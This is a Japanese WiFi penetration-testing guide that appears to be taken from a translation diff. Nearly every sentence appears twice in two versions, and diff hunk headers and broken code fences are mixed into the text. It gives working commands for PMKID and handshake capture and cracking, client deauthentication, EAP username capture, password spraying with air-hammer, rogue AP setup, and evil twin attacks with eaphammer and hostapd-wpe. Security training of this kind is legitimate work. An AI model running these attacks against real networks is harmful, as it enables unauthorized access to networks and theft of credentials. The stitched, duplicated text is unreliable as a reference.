<figure><img src="../../.gitbook/assets/image (1) (3) (1).png" alt=""><figcaption></figcaption></figure>
[**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) サーバーに参加して、経験豊富なハッカーやバグバウンティハンターとコミュニケーションを取りましょう!
**ハッキングの洞察**\
ハッキングのスリルとチャレンジに深く入り込むコンテンツに参加しましょう
ハッキングのスリルとチャレンジに深く入り込むコンテンツに参加
**リアルタイムのハックニュース**\
リアルタイムのニュースと洞察を通じて、ハッキングの世界の速いペースについていきましょう
リアルタイムのニュースと洞察を通じて、ハッキングの世界の速いペースに遅れずについていく
**最新の発表**\
最新のバグバウンティの開始や重要なプラットフォームの更新について情報を得ましょう
最新のバグバウンティの開始や重要なプラットフォームの更新情報を把握
**[**Discord**](https://discord.com/invite/N3FrSbmwdy)** で私たちに参加し、今日からトップハッカーと協力を始めましょう!
***
**[**Discord**](https://discord.com/invite/N3FrSbmwdy) に参加して、今日からトップハッカーと協力を始めましょう!
## WPA/WPA2 PSK
### PMKID
2018年、hashcatの作者は、**1つのパケット**に依存する新しいタイプの攻撃を[公開](https://hashcat.net/forum/thread-7717.html)しましたが、この攻撃にはターゲットAPに接続されているクライアントは必要ありませんが、攻撃者とAPとの通信だけで済みます。
2018年、**hashcat** は、[新しい攻撃手法](https://hashcat.net/forum/thread-7717.html)を公開しました。これは、**1つのパケット**だけが必要で、ターゲットAPにクライアントが接続されている必要がないという点でユニークです。攻撃者とAPとの間の相互作用だけが必要です。
現代の多くのルーターが、誰かが関連付けを行うときにAP自体から送信される最初のEAPOLフレームの末尾に**オプションのフィールド**を追加することがわかりました。これを`Robust Security Network`と呼び、`PMKID`と呼ばれるものを含んでいます。
多くの現代のルーターは、関連付け中に最初のEAPOLフレームに**オプションフィールド**を追加します。これは`Robust Security Network`として知られるもので、`PMKID`を含みます。
元の投稿で説明されているように、**PMKID**は、私たちに知られているデータを使用して派生します:
```
元の投稿によると、**PMKID** は既知のデータを使用して作成されます:
```bash
PMKID = HMAC-SHA1-128(PMK, "PMK Name" | MAC_AP | MAC_STA)
```
**“PMK Name”文字列が一定であるため、APとステーションのBSSID、および`PMK`が完全な4ウェイハンドシェイクから取得されたものと同じであることがわかっているため、これはhashcatがPSKを解読し、パスフレーズを回復するために必要なすべてです**\
[こちら](https://www.evilsocket.net/2019/02/13/Pwning-WiFi-networks-with-bettercap-and-the-PMKID-client-less-attack/)から取得した説明。
与えられた「PMK Name」が一定であることを考慮すると、APとステーションのBSSIDを知っており、`PMK`が完全な4ウェイハンドシェイクからのものと同一である場合、**hashcat**はこの情報を使用してPSKを解読し、パスフレーズを回復できます
この情報を**収集**し、ローカルでパスワードを**ブルートフォース**するには、次の手順を実行できます:
この情報を**収集**し、パスワードをローカルで**ブルートフォース**するには、次の操作を行うことができます:
```bash
airmon-ng check kill
airmon-ng start wlan0
@ -327,8 +324,8 @@ hcxtools/hcxpcaptool -z hashes.txt /tmp/attack.pcapng
hashcat -m 16800 --force hashes.txt /usr/share/wordlists/rockyou.txt
john hashes.txt --wordlist=/usr/share/wordlists/rockyou.txt
```
正しいハッシュの形式は**4つの部分**を含んでいることに注意してください。例: _4017733ca8db33a1479196c2415173beb808d7b83cfaa4a6a9a5aae7\*566f6461666f6e65436f6e6e6563743034383131343838_\
\_\_もし**3つの部分**しか含まれていない場合、それは**無効**ですPMKIDキャプチャが有効ではありませんでした)。
正しいハッシュの形式は**4つの部分**を含んでいることに注意してください。例: `4017733ca8db33a1479196c2415173beb808d7b83cfaa4a6a9a5aae7566f6461666f6e65436f6e6e6563743034383131343838`
もし**3つの部分**しか含まれていない場合、それは**無効**ですPMKIDキャプチャが有効ではありません
`hcxdumptool`は**ハンドシェイクもキャプチャ**します(次のようなものが表示されます: **`MP:M1M2 RC:63258 EAPOLTIME:17091`**)。`cap2hccapx`を使用して**ハンドシェイク**を**hashcat**/**john**形式に**変換**することができます。
```bash
@ -338,26 +335,28 @@ hccap2john pmkid.hccapx > handshake.john
john handshake.john --wordlist=/usr/share/wordlists/rockyou.txt
aircrack-ng /tmp/att.pcap -w /usr/share/wordlists/rockyou.txt #Sometimes
```
_このツールでキャプチャされた一部のハンドシェイクは、正しいパスワードを知っていてもクラックできないことがありました。可能であれば、伝統的な方法でもハンドシェイクをキャプチャするか、このツールを使用して複数のハンドシェイクをキャプチャすることをお勧めします。_
_このツールでキャプチャされた一部のハンドシェイクは、正しいパスワードを知っていても解読できないことがありました。可能であれば、従来の方法でもハンドシェイクをキャプチャするか、このツールを使用して複数のハンドシェイクをキャプチャすることをお勧めします。_
### ハンドシェイクのキャプチャ
**WPA/WPA2** ネットワークを攻撃する方法の1つは、**ハンドシェイク**をキャプチャして使用されたパスワードを**オフライン**で**クラック**しようとすることです。これを行うには、**被害者**ネットワークの**BSSID**と**チャンネル**、およびネットワークに接続されている**クライアント**を見つける必要があります。\
この情報を入手したら、その**BSSID**がその**チャンネル**でのすべての通信を**リッスン**する必要があります。なぜなら、ハンドシェイクがそこに送信されることを期待しているからです。
**WPA/WPA2** ネットワークへの攻撃は、**ハンドシェイク**をキャプチャしてパスワードを**オフライン**で**解読**することによって実行できます。このプロセスには、特定のネットワークと**BSSID**、特定の**チャンネル**上の通信を監視することが含まれます。以下は簡略化されたガイドです:
1. ターゲットネットワークの**BSSID**、**チャンネル**、および**接続されたクライアント**を特定します。
2. `airodump-ng`を使用して、指定されたチャンネルとBSSID上のネットワークトラフィックを監視し、ハンドシェイクをキャプチャしようとします。コマンドは次のようになります
```bash
airodump-ng wlan0 -c 6 --bssid 64:20:9F:15:4F:D7 -w /tmp/psk --output-format pcap
```
今、数秒間**クライアント**を**deauthenticate**する必要があります。これにより、自動的にAPに再認証されますクライアントをdeauthenticateするいくつかの方法については、DoSの部分を読んでください:
3. シェイクハンドをキャプチャする可能性を高めるために、一時的にクライアントをネットワークから切断して再認証を強制します。これは、`aireplay-ng`コマンドを使用して行うことができます。このコマンドは、クライアントに切断パケットを送信します。
```bash
aireplay-ng -0 0 -a 64:20:9F:15:4F:D7 wlan0 #Send generic deauth packets, not always work
aireplay-ng -0 0 -a 64:20:9F:15:4F:D7 wlan0 #Send generic deauth packets, may not work in all scenarios
```
_クライアントが認証解除された場合、別のAPに接続しようとする可能性があるか、別のネットワークに接続しようとする場合があります。_
_クライアントが認証解除された場合、別のAPに接続しようとする可能性があることに注意してください。また、他の場合では、異なるネットワークに接続しようとすることもあります。_
`airodump-ng`にハンドシェイク情報が表示されると、ハンドシェイクがキャプチャされたことを意味し、リスニングを停止できます:
![](<../../.gitbook/assets/image (172) (1).png>)
ハンドシェイクがキャプチャされたら、`aircrack-ng`で**クラック**することができます:
ハンドシェイクがキャプチャされると、`aircrack-ng`でそれを**クラック**できます:
```
aircrack-ng -w /usr/share/wordlists/rockyou.txt -b 64:20:9F:15:4F:D7 /tmp/psk*.cap
```
@ -384,57 +383,63 @@ pyrit -r psk-01.cap analyze
```
## **WPAエンタープライズMGT**
**企業Wifiで使用されるさまざまな認証方法**について話すことが重要です。この種のWifiでは、`airodump-ng`で次のようなものが見つかる可能性があります。
**エンタープライズWiFiセットアップでは、さまざまな認証方法に遭遇します**。それぞれが異なるセキュリティレベルと管理機能を提供します。`airodump-ng`のようなツールを使用してネットワークトラフィックを調査すると、これらの認証タイプの識別子が表示されることがあります。一般的な方法には次のものがあります:
```
6A:FE:3B:73:18:FB -58 19 0 0 1 195 WPA2 CCMP MGT NameOfMyWifi
```
**EAP**Extensible Authentication Protocolは**認証通信**の**骨組み**であり、その上にサーバーが**クライアント****supplicant**)を認証するために**認証アルゴリズム**が使用され、場合によってはクライアントがサーバーを認証するためにも使用されます。\
この場合に使用される主要な認証アルゴリズム:
1. **EAP-GTC (Generic Token Card)**:
- この方法は、EAP-PEAP内でハードウェアトークンとワンタイムパスワードをサポートしています。MSCHAPv2とは異なり、ピアチャレンジを使用せず、パスワードを平文でアクセスポイントに送信するため、ダウングレード攻撃のリスクがあります。
- **EAP-GTC:** EAPメソッドで、ハードウェアトークンとワンタイムパスワードをEAP-PEAPでサポートするために使用されます。実装はMSCHAPv2に類似していますが、ピアチャレンジは使用しません。代わりに、パスワードは**平文**でアクセスポイントに送信されます(ダウングレード攻撃に非常に興味深い)。
- **EAP-MD-5メッセージダイジェスト**: クライアントはパスワードのMD5ハッシュを送信します。**推奨されません**辞書攻撃に対して脆弱であり、サーバー認証がなく、セッションごとのWEPキーを生成する方法がありません。
- **EAP-TLSトランスポートレイヤーセキュリティ**: **クライアント側とサーバー側の証明書**に依存して認証を行い、ユーザーベースおよびセッションベースのWEPキーを動的に生成して、その後の通信を保護します。
- **EAP-TTLSトンネルトランスポートレイヤーセキュリティ**: 暗号化されたチャネル(またはトンネル)を介してクライアントとネットワークの**相互認証**を行い、動的なユーザーごとのセッションごとのWEPキーを導出する手段を提供します。EAP-TLSとは異なり、**EAP-TTLSはサーバー側の証明書のみを必要としますクライアントは資格情報を使用します**。
- **PEAP保護拡張認証プロトコル**: PEAPは**EAP**プロトコルのようですが、通信を保護するために**TLSトンネル**を作成します。その後、EAPの上に弱い認証プロトコルを使用できますが、それらはトンネルによって保護されます。
- **PEAP-MSCHAPv2**: これは**PEAP**としても知られています。これはPEAPの上に脆弱なチャレンジ/レスポンスであるMSCHAPv2が配置されていますTLSトンネルによって保護されています
- **PEAP-EAP-TLSまたはPEAP-TLS**: **EAP-TLS**に非常に似ていますが、証明書の交換の前にTLSトンネルが作成されます。
2. **EAP-MD5 (Message Digest 5)**:
- クライアントからパスワードのMD5ハッシュを送信することを含みます。辞書攻撃に対する脆弱性、サーバー認証の欠如、およびセッション固有のWEPキーの生成能力の欠如のため、**推奨されていません**。
3. **EAP-TLS (Transport Layer Security)**:
- 認証のためにクライアント側とサーバー側の証明書の両方を利用し、ユーザーベースおよびセッションベースのWEPキーを動的に生成して通信を保護します。
4. **EAP-TTLS (Tunneled Transport Layer Security)**:
- 暗号化されたトンネルを介して相互認証を提供し、ダイナミックでユーザーごと、セッションごとのWEPキーを導出する方法を提供します。クライアントは資格情報を使用し、サーバー側の証明書のみが必要です。
5. **PEAP (Protected Extensible Authentication Protocol)**:
- 保護された通信のためにTLSトンネルを作成することで、EAPと同様に機能します。EAPの上に弱い認証プロトコルを使用できるのは、トンネルによって提供される保護のためです。
* **PEAP-MSCHAPv2**: PEAPとも呼ばれ、脆弱なMSCHAPv2のチャレンジ/レスポンスメカニズムを保護するTLSトンネルを組み合わせています。
* **PEAP-EAP-TLS (またはPEAP-TLS)**: EAP-TLSと類似していますが、証明書の交換の前にTLSトンネルを開始し、追加のセキュリティレイヤーを提供します。
これらの認証方法に関する詳細情報は[こちら](https://en.wikipedia.org/wiki/Extensible\_Authentication\_Protocol)および[こちら](https://www.intel.com/content/www/us/en/support/articles/000006999/network-and-i-o/wireless-networking.html)で入手できます。
### ユーザー名のキャプチャ
[https://tools.ietf.org/html/rfc3748#page-27](https://tools.ietf.org/html/rfc3748#page-27)を読むと、**EAP**を使用している場合、**"Identity"** **メッセージ**が**サポート**されている必要があり、**ユーザー名**が**"Response Identity"**メッセージで**クリア**に送信されることになります。
[https://tools.ietf.org/html/rfc3748#page-27](https://tools.ietf.org/html/rfc3748#page-27)を読むと、**EAP**を使用している場合、**"Identity"** **メッセージ**を**サポート**する必要があり、**ユーザー名**は**"Response Identity"**メッセージで**クリア**に送信されます。
最も安全な認証方法の1つである**PEAP-EAP-TLS**を使用していても、**EAPプロトコルで送信されユーザー名をキャプチャ**することが可能です。これを行うには、**認証通信をキャプチャ**チャネル内で`airodump-ng`を開始し、同じインターフェースで`wireshark`を開始)、パケットを`eapol`でフィルタリングします。\
最も安全な認証方法の1つである**PEAP-EAP-TLS**を使用していても、**EAPプロトコルで送信されユーザー名をキャプチャ**することが可能です。これを行うには、**認証通信をキャプチャ**`airodump-ng`をチャンネル内で開始し、同じインターフェースで`wireshark`を開始)、パケットを`eapol`でフィルタリングします。\
**"Response, Identity"**パケットの中に、クライアントの**ユーザー名**が表示されます。
![](<../../.gitbook/assets/image (150).png>)
### 匿名ID
EAP-PEAPおよびEAP-TTLSの両方で、**匿名ID**の非表示がサポートされています。WiFiネットワークのコンテキストでは、EAP-Identityリクエストは通常、アクセスポイントAPによって関連付けプロセス中に開始されます。ユーザーの匿名性を保護するために、ユーザーのデバイス上のEAPクライアントからの応答には、リクエストを処理するために初期のRADIUSサーバーに必要な基本情報のみが含まれます。この概念は、次のシナリオを通じて説明されます
EAP-PEAPおよびEAP-TTLSの両方で、アイデンティティの非表示がサポートされています。WiFiネットワークのコンテキストでは、EAP-Identityリクエストは通常、アクセスポイントAPによって関連付けプロセス中に開始されます。ユーザーの匿名性を保護するために、ユーザーのデバイス上のEAPクライアントからの応答には、リクエストを処理する初期のRADIUSサーバーに必要な基本情報のみが含まれます。この概念は、次のシナリオを通じて説明されます
- EAP-Identity = anonymous
* EAP-Identity = anonymous
- このシナリオでは、すべてのユーザーが疑似的な「anonymous」をユーザー識別子として使用します。初期のRADIUSサーバーはEAP-PEAPまたはEAP-TTLSサーバーとして機能し、PEAPまたはTTLSプロトコルのサーバーサイドを管理します。その後、内部保護された認証メソッドは、ローカルで処理されるか、リモートホームRADIUSサーバーに委任されます。
- このシナリオでは、すべてのユーザーが疑似匿名の「anonymous」をユーザー識別子として使用します。初期のRADIUSサーバーは、EAP-PEAPまたはEAP-TTLSプロトコルのサーバーサイドを管理する責任があります。その後、内部保護された認証メソッドは、ローカルで処理されるか、リモートホームRADIUSサーバーに委任されます。
- EAP-Identity = anonymous@realm_x
* EAP-Identity = anonymous@realm_x
- この状況では、異なるレルムのユーザーは自分たちのレルムを示しながら自分たちのアイデンティティを隠します。これにより、初期のRADIUSサーバーは、ユーザーのホームレルムのRADIUSサーバーにEAP-PEAPまたはEAP-TTLSリクエストをプロキシし、そのサーバーがPEAPまたはTTLSサーバーとして機能します。初期のRADIUSサーバーは、単にRADIUSリレーードとして動作します。
- この状況では、異なるレルムのユーザーが自分のレルムを示しながらアイデンティティを隠します。これにより、初期のRADIUSサーバーは、彼らのホームレルムのRADIUSサーバーにEAP-PEAPまたはEAP-TTLSリクエストをプロキシし、PEAPまたはTTLSサーバーとして機能します。初期のRADIUSサーバーは、単にRADIUSリレーードとして動作します。
- 代わりに、初期のRADIUSサーバーはEAP-PEAPまたはEAP-TTLSサーバーとして機能し、保護された認証メソッドを処理するか、別のサーバーに転送ます。このオプションは、さまざまなレルムに異なるポリシーを構成することを可能にします。
- 代わりに、初期のRADIUSサーバーはEAP-PEAPまたはEAP-TTLSサーバーとして機能し、保護された認証メソッドを処理するか、別のサーバーに転送することができます。このオプションは、さまざまなレルムに異なるポリシーを構成することを容易にします。
EAP-PEAPでは、PEAPサーバーとPEAPクライアント間にTLSトンネルが確立されると、PEAPサーバーEAP-Identityリクエストを開始し、TLSトンネルを介して送信します。クライアントは、この2番目のEAP-Identityリクエストに応答して、暗号化されたトンネルを介してユーザーの実際のアイデンティティを含むEAP-Identity応答を送信します。このアプローチにより、802.11トラフィックを盗聴している人にユーザーの実際のアイデンティティが明らかにされるのを効果的に防ぎます。
EAP-PEAPでは、PEAPサーバーとPEAPクライアント間にTLSトンネルが確立されると、PEAPサーバーEAP-Identityリクエストを開始し、TLSトンネルを介して送信します。クライアントは、この2番目のEAP-Identityリクエストに応答して、暗号化されたトンネルを介してユーザーの実際のアイデンティティを含むEAP-Identity応答を送信します。このアプローチにより、802.11トラフィックを盗聴している人にユーザーの実際のアイデンティティが明らかにされるのを効果的に防ぎます。
EAP-TTLSはやや異なる手順に従います。EAP-TTLSでは、クライアントは通常、TLSトンネルで保護されたPAPまたはCHAPを使用して認証します。この場合、クライアントは、トンネル確立後に送信される最初のTLSメッセージにUser-Name属性とPasswordまたはCHAP-Password属性を含めます。
EAP-TTLSはやや異なる手順に従います。EAP-TTLSでは、通常、TLSトンネルで保護されたPAPまたはCHAPを使用してクライアントが認証します。この場合、クライアントは、トンネル確立後に送信される最初のTLSメッセージにUser-Name属性とPasswordまたはCHAP-Password属性を含めます。
選択したプロトコルに関係なく、PEAP/TTLSサーバーはTLSトンネルが確立された後にユーザーの実際のアイデンティティを取得します。実際のアイデンティティは、user@realmまたは単にuserとして表されます。PEAP/TTLSサーバーがユーザーの認証も担当する場合、ユーザーのアイデンティティを取得し、TLSトンネルで保護された認証メソッドを続行します。別の場合、PEAP/TTLSサーバーはユーザーのホームRADIUSサーバーに新しいRADIUSリクエストを転送します。この新しいRADIUSリクエストにはPEAPまたはTTLSプロトコルレイヤーが含まれません。保護された認証メソッドがEAPである場合、内部EAPメッセージはEAP-PEAPまたはEAP-TTLSラッパーなしでホームRADIUSサーバーに送信されます。送信されるRADIUSメッセージのUser-Name属性には、着信RADIUSリクエストで見つかった匿名User-Nameを置き換えるため、ユーザーの実際のアイデンティティが含まれます。保護された認証メソッドがPAPまたはCHAPTTLSのみサポートである場合、TLSペイロードから抽出されたUser-Nameおよびその他の認証属性が、着信RADIUSリクエストで見つかった匿名User-NameおよびTTLS EAP-Message属性を置き換え、送信されるRADIUSメッセージに代入されます。
選択したプロトコルに関係なく、PEAP/TTLSサーバーはTLSトンネルが確立された後にユーザーの実際のアイデンティティを取得します。実際のアイデンティティは、user@realmまたは単にuserとして表されます。PEAP/TTLSサーバーがユーザーの認証も担当する場合、ユーザーのアイデンティティを取得し、TLSトンネルで保護された認証メソッドを続行します。別の場合、PEAP/TTLSサーバーはユーザーのホームRADIUSサーバーに新しいRADIUSリクエストを転送します。この新しいRADIUSリクエストにはPEAPまたはTTLSプロトコルレイヤーが含まれません。保護された認証メソッドがEAPである場合、内部EAPメッセージはEAP-PEAPまたはEAP-TTLSラッパーなしでホームRADIUSサーバーに送信されます。送信されるRADIUSメッセージのUser-Name属性には、着信RADIUSリクエストからの匿名User-Nameを置き換えるユーザーの実際のアイデンティティが含まれます。保護された認証メソッドがPAPまたはCHAPTTLSのみサポートされるである場合、TLSペイロードから抽出されたUser-Nameおよびその他の認証属性が、着信RADIUSリクエストで見つか匿名User-NameおよびTTLS EAP-Message属性を置き換え、送信されるRADIUSメッセージに代入されます。
詳細については、[こちら](https://www.interlinknetworks.com/app\_notes/eap-peap.htm)を参照してください。
### EAP-Bruteforceパスワードスプレー
クライアントが**ユーザー名とパスワード**を使用することが期待される場合(**EAP-TLSはこの場合有効ではありません**)、**ユーザー名****リスト**(次の部分を参照)と**パスワード**を取得して、[**air-hammer**](https://github.com/Wh1t3Rh1n0/air-hammer)を使用してアクセスを**ブルートフォース**することができます。
クライアントが**ユーザー名とパスワード**を使用することが期待される場合(**EAP-TLSはこの場合有効ではありません**)、**ユーザー名のリスト**(次の部分を参照)と**パスワード**を取得して、[**air-hammer**](https://github.com/Wh1t3Rh1n0/air-hammer)を使用してアクセスを**ブルートフォース**することができます。
```bash
./air-hammer.py -i wlan0 -e Test-Network -P UserPassword1 -u usernames.txt
```
@ -450,36 +455,39 @@ EAP-TTLSはやや異なる手順に従います。EAP-TTLSでは、クライア
### ネットワーク選択とローミング
802.11プロトコルはESSに参加する方法を規定する非常に具体的なルールを持っていますが、ステーションが接続するESSを選択する方法は規定していません。さらに、プロトコルは、同じESSIDを共有するアクセスポイント間を自由にローミングできるようにします建物の一方から他方に移動する際にWiFi接続を失いたくないため。ただし、802.11プロトコルはこれらのアクセスポイントがどのように選択されるべきかを規定していません。さらに、ステーションはアクセスポイントに関連付けるためにESSに認証されなければならないが、802.11プロトコルはアクセスポイントがステーションに認証されることを要求していません。
- 802.11プロトコルは、ステーションが拡張サービスセットESSに参加する方法を定義していますが、ESSまたはそれに含まれるアクセスポイントAPを選択する基準を指定していません。
- ステーションは、同じESSIDを共有するAP間をローミングでき、建物やエリア全体で接続を維持します。
- プロトコルは、ステーションがESSに対して認証することを要求しますが、APがステーションに対して認証することは義務付けていません。
### 優先ネットワークリストPNL
ステーションがワイヤレスネットワークに接続するたびに、ネットワークのESSIDがステーションの優先ネットワークリストPNLに保存されます。 PNLは、ステーションが過去に接続したすべてのネットワークの順序付きリストであり、PNLの各エントリには、ネットワークのESSIDと接続を確立するために必要なネットワーク固有の構成情報が含まれています。
- ステーションは、接続する無線ネットワークのESSIDを、ネットワーク固有の構成詳細と共に、優先ネットワークリストPNLに保存します。
- PNLは、既知のネットワークに自動的に接続するために使用され、接続プロセスを効率化してユーザーエクスペリエンスを向上させます。
### パッシブスキャン
インフラストラクチャネットワークでは、アクセスポイントは定期的にビーコンフレームを送信して、近くのステーションに自分の存在と機能を広告します。 ビーコンはブロードキャストフレームであり、つまり、範囲内のすべての近くのステーションに受信されることを意味します。 ビーコンには、APのサポートされているレート、暗号化機能、追加情報、そして最も重要なのは、APのESSIDが含まれていますESSIDブロードキャストが無効になっていない限り)。
パッシブスキャン中、クライアントデバイスは近くのアクセスポイントからのビーコンフレームを受信します。 クライアントデバイスがクライアントのPNLからのESSIDと一致するESSIDフィールドを持つビーコンフレームを受信した場合、クライアントはそのビーコンフレームを送信したアクセスポイントに自動的に接続します。 そして、現在どのワイヤレスにも接続されていないワイヤレスデバイスをターゲットにしたいとします。 そのクライアントのPNLの少なくとも1つのエントリを知っている場合、そのエントリのESSIDを持つ自分自身のアクセスポイントを作成するだけで、クライアントを接続させることができます。
- APは定期的にビーコンフレームをブロードキャストし、存在と機能をアナウンスします。APのESSIDを含むブロードキャストが無効になっていない限り)。
- パッシブスキャン中、ステーションはビーコンフレームを受信します。ビーコンのESSIDがステーションのPNLのエントリと一致する場合、ステーションはそのAPに自動的に接続する可能性があります。
- デバイスのPNLの知識により、既知のネットワークのESSIDを模倣してデバイスをローグAPに接続させることで潜在的な攻撃が可能となります。
### アクティブプロービング
802.11で使用される2番目のネットワーク選択アルゴリズムはアクティブプロービングとして知られています。 アクティブプロービングを使用するクライアントデバイスは、APが範囲内にあるかどうか、およびその機能が何であるかを確認するために、継続的にプローブリクエストフレームを送信します。 プローブリクエストには、指示されたものとブロードキャストの2つの形式があります。 指示されたプローブリクエストは特定のESSIDにアドレス指定され、特定のネットワークが近くにあるかどうかをクライアントが確認する方法です。
指示されたプローブリクエストを使用するクライアントは、PNL内の各ネットワークに対してプローブリクエストを送信します。 近くに隠れたネットワークが存在することを特定する唯一の方法が指示されたプロービングであることに注意する必要があります。 ブロードキャストプローブリクエストはほぼ同じ方法で機能しますが、SSIDフィールドがNULLに設定されています。 これにより、ブロードキャストプローブがすべての近くのアクセスポイントに送信され、ステーションはPNLの内容を明らかにせずに、好ましいネットワークが近くにあるかどうかを確認できます。
- アクティブプロービングには、ステーションが近くのAPを発見するためにプローブリクエストを送信することが含まれます。
- ディレクテッドプローブリクエストは特定のESSIDを対象とし、特定のネットワークが範囲内にあるかどうかを検出するのに役立ちます非表示ネットワークであっても
- ブロードキャストプローブリクエストにはヌルのSSIDフィールドがあり、すべての近くのAPに送信され、ステーションがPNLの内容を開示せずに任意の優先ネットワークをチェックできます。
## インターネットにリダイレクトされるシンプルなAP
より複雑な攻撃を実行する方法を説明する前に、**インターネットに接続されたインターフェースにトラフィックをリダイレクト**する**AP**を**作成**する方法について説明します。
より複雑な攻撃を実行する方法を説明する前に、**インターフェース**に接続された**インターネット**に**トラフィック**を**リダイレクト**するだけの**AP**を**作成**する方法について説明します。
`ifconfig -a` を使用して、APを作成するためのwlanインターフェースとインターネットに接続されたインターフェースが存在することを確認します。
`ifconfig -a`を使用して、APを作成するためのwlanインターフェースとインターネットに接続されたインターフェースが存在することを確認します。
### DHCP & DNS
```bash
apt-get install dnsmasq #Manages DHCP and DNS
```
以下のように _/etc/dnsmasq.conf_ という設定ファイルを作成します:
```
`/etc/dnsmasq.conf` ファイルを作成します:
```ini
interface=wlan0
dhcp-authoritative
dhcp-range=192.168.1.2,192.168.1.30,255.255.255.0,12h
@ -490,29 +498,21 @@ log-queries
log-dhcp
listen-address=127.0.0.1
```
次に、**IPアドレス**と**ルート**を設定します:
```
その後、**IPアドレス**と**ルート**を設定します:
```bash
ifconfig wlan0 up 192.168.1.1 netmask 255.255.255.0
route add -net 192.168.1.0 netmask 255.255.255.0 gw 192.168.1.1
```
そして、**dnsmasq**を**開始**します:
```
```bash
dnsmasq -C dnsmasq.conf -d
```
### hostapd
### hostapd
```
```bash
apt-get install hostapd
```
```plaintext
Create a config file _hostapd.conf:_
```
```plaintext
ホストAPDの設定ファイル _hostapd.conf:_ を作成してください。
```
```
`hostapd.conf`という設定ファイルを作成します:
```ini
interface=wlan0
driver=nl80211
ssid=MITIWIFI
@ -530,7 +530,7 @@ ieee80211n=1
wme_enabled=1
```
**うるさいプロセスを停止**し、**モニターモード**を設定し、**hostapdを起動**します:
```
```bash
airmon-ng check kill
iwconfig wlan0 mode monitor
ifconfig wlan0 up
@ -544,18 +544,20 @@ echo 1 > /proc/sys/net/ipv4/ip_forward
```
## イービルツイン
イービルツイン攻撃は、ほとんどのコンピュータや携帯電話がワイヤレスネットワークの「名前」またはESSIDのみを見るために機能するWi-Fi攻撃の一種です基地局はクライアントに対して認証を必要としないため。実際、同じ名前と同じ種類の暗号化を使用するネットワークを区別するのは非常に難しいことになります。実際、多くのネットワークは、ユーザーを混乱させることなくアクセスを拡張するために、同じ名前を使用する複数のネットワーク拡張アクセスポイントを持っています。
イービルツイン攻撃は、WiFiクライアントがネットワークを認識する方法を悪用し、基地局アクセスポイントがクライアントに認証されることなく、主にネットワーク名ESSIDに依存しています。主なポイントは次のとおりです
クライアントの実装方法による802.11プロトコルにより、同じESS内のアクセスポイント間を自由にローミングできることを覚えておいてください、デバイスを接続されている基地局を変更させることが可能です。これは、より良い信号を提供すること常に可能とは限りませんや、元の基地局へのアクセスをブロックすること認証解除パケット、ジャミング、またはその他の形式のDoS攻撃によって行うことが可能です。
- **区別の難しさ**デバイスは、同じESSIDと暗号化タイプを共有する場合、合法的なアクセスポイントと偽のアクセスポイントを区別するのに苦労します。実世界のネットワークでは、同じESSIDを持つ複数のアクセスポイントがシームレスにカバレッジを拡張するために使用されることがよくあります。
また、実際のワイヤレス展開では通常、単一のアクセスポイントよりも複数のアクセスポイントがあり、これらのアクセスポイントは天井に向けて配置されているため、より強力で視界の良い範囲を持っています。単一のアクセスポイントの認証解除は、通常、ターゲットがローグAPではなく別の有効なアクセスポイントにローミングする結果となります、周辺のすべてのアクセスポイントが認証解除されているラウドか、ローグAPの配置に非常に注意を払っている場合難しいを除いて
- **クライアントのローミングと接続の操作**802.11プロトコルでは、デバイスが同じESS内のアクセスポイント間をローミングできるようになっています。攻撃者は、デバイスを現在の基地局から切断させ、偽の基地局に接続させることができます。これは、より強力な信号を提供したり、切断パケットやジャミングなどの手法を使用して合法的なアクセスポイントへの接続を妨害することで達成できます
インターネットへのトラフィックをルーティングする機能がない非常に基本的なオープンイービルツインを作成することができます。
- **実行上の課題**:複数の適切な場所に配置されたアクセスポイントがある環境でイービルツイン攻撃を成功させることは難しい場合があります。単一の合法的なアクセスポイントを切断すると、デバイスが別の合法的なアクセスポイントに接続することがよくあります。攻撃者が近くのすべてのアクセスポイントを切断するか、偽のアクセスポイントを戦略的に配置しない限り、この問題が発生します。
非常に基本的なオープンイービルツイン(インターネットへのトラフィックをルーティングする機能がない)を作成できます:
```bash
airbase-ng -a 00:09:5B:6F:64:1E --essid "Elroy" -c 1 wlan0mon
```
あなたは**eaphammer**を使用してEvil Twinを作成することもできますeaphammerを使用してEvil Twinを作成するには、インターフェースが**モニター**モードになっていては**いけません**)。
```
あなたは**eaphammer**を使用してEvil Twinを作成することもできますeaphammerを使用してEvil Twinを作成するには、インターフェースが**モニター**モードになっていては**いけない**ことに注意してください):
```bash
./eaphammer -i wlan0 --essid exampleCorp --captive-portal
```
または、Airgeddonを使用する`オプション5,6,7,8,9Evil Twin攻撃メニュー内。`
@ -568,24 +570,24 @@ _一部のOSとAVは、オープンネットワークに接続することは危
### WPA/WPA2 Evil Twin
**WPA/2を使用しEvil Twin**を作成することができ、デバイスがWPA/2でそのSSIDに接続するように構成されている場合、接続を試みるでしょう。ただし、**4ウェイハンドシェイクを完了**するには、クライアントが使用する**パスワードを知る**必要があります。**知らない**場合、**接続は完了しません**。
```
**WPA/2を使用しEvil Twin**を作成することができ、デバイスがWPA/2でそのSSIDに接続するように構成されている場合、接続を試みるでしょう。ただし、**4ウェイハンドシェイクを完了**するには、クライアントが使用する**パスワードを知る**必要があります。**知らない**場合、**接続は完了しません**。
```bash
./eaphammer -i wlan0 -e exampleCorp -c 11 --creds --auth wpa-psk --wpa-passphrase "mywifipassword"
```
### エンタープライズイービルツイン
### エンタープライズイービルツイン
この攻撃を理解するためには、まず[WPAエンタープライズの説明](./#wpa-enterprise-mgt)を読むことをお勧めします。
**hostapd-wpeの使用**
`hostapd-wpe`は動作するために**設定**ファイルが必要です。これらの設定を自動化するために、[https://github.com/WJDigby/apd\_launchpad](https://github.com/WJDigby/apd\_launchpad)を使用できます_ /etc/hostapd-wpe/_内のPythonファイルをダウンロードしてください
```
`hostapd-wpe`は動作するために**構成**ファイルが必要です。これらの構成を自動化するために、[https://github.com/WJDigby/apd\_launchpad](https://github.com/WJDigby/apd\_launchpad)を使用できます_ /etc/hostapd-wpe/_内のPythonファイルをダウンロードしてください
```bash
./apd_launchpad.py -t victim -s PrivateSSID -i wlan0 -cn company.com
hostapd-wpe ./victim/victim.conf -s
```
設定ファイルでは、ssid、channel、user files、cret/key、dh parameters、wpa version、authなど、さまざまな項目を選択できます。
[**EAP-TLSを使用してhostapd-wpeを使用し、任意の証明書でログインを許可する**](evil-twin-eap-tls.md)
[**EAP-TLSを使用してhostapd-wpeを使用し、任意の証明書でログインを許可する方法**](evil-twin-eap-tls.md)
**EAPHammerの使用**
```bash
@ -595,15 +597,15 @@ hostapd-wpe ./victim/victim.conf -s
# Launch Attack
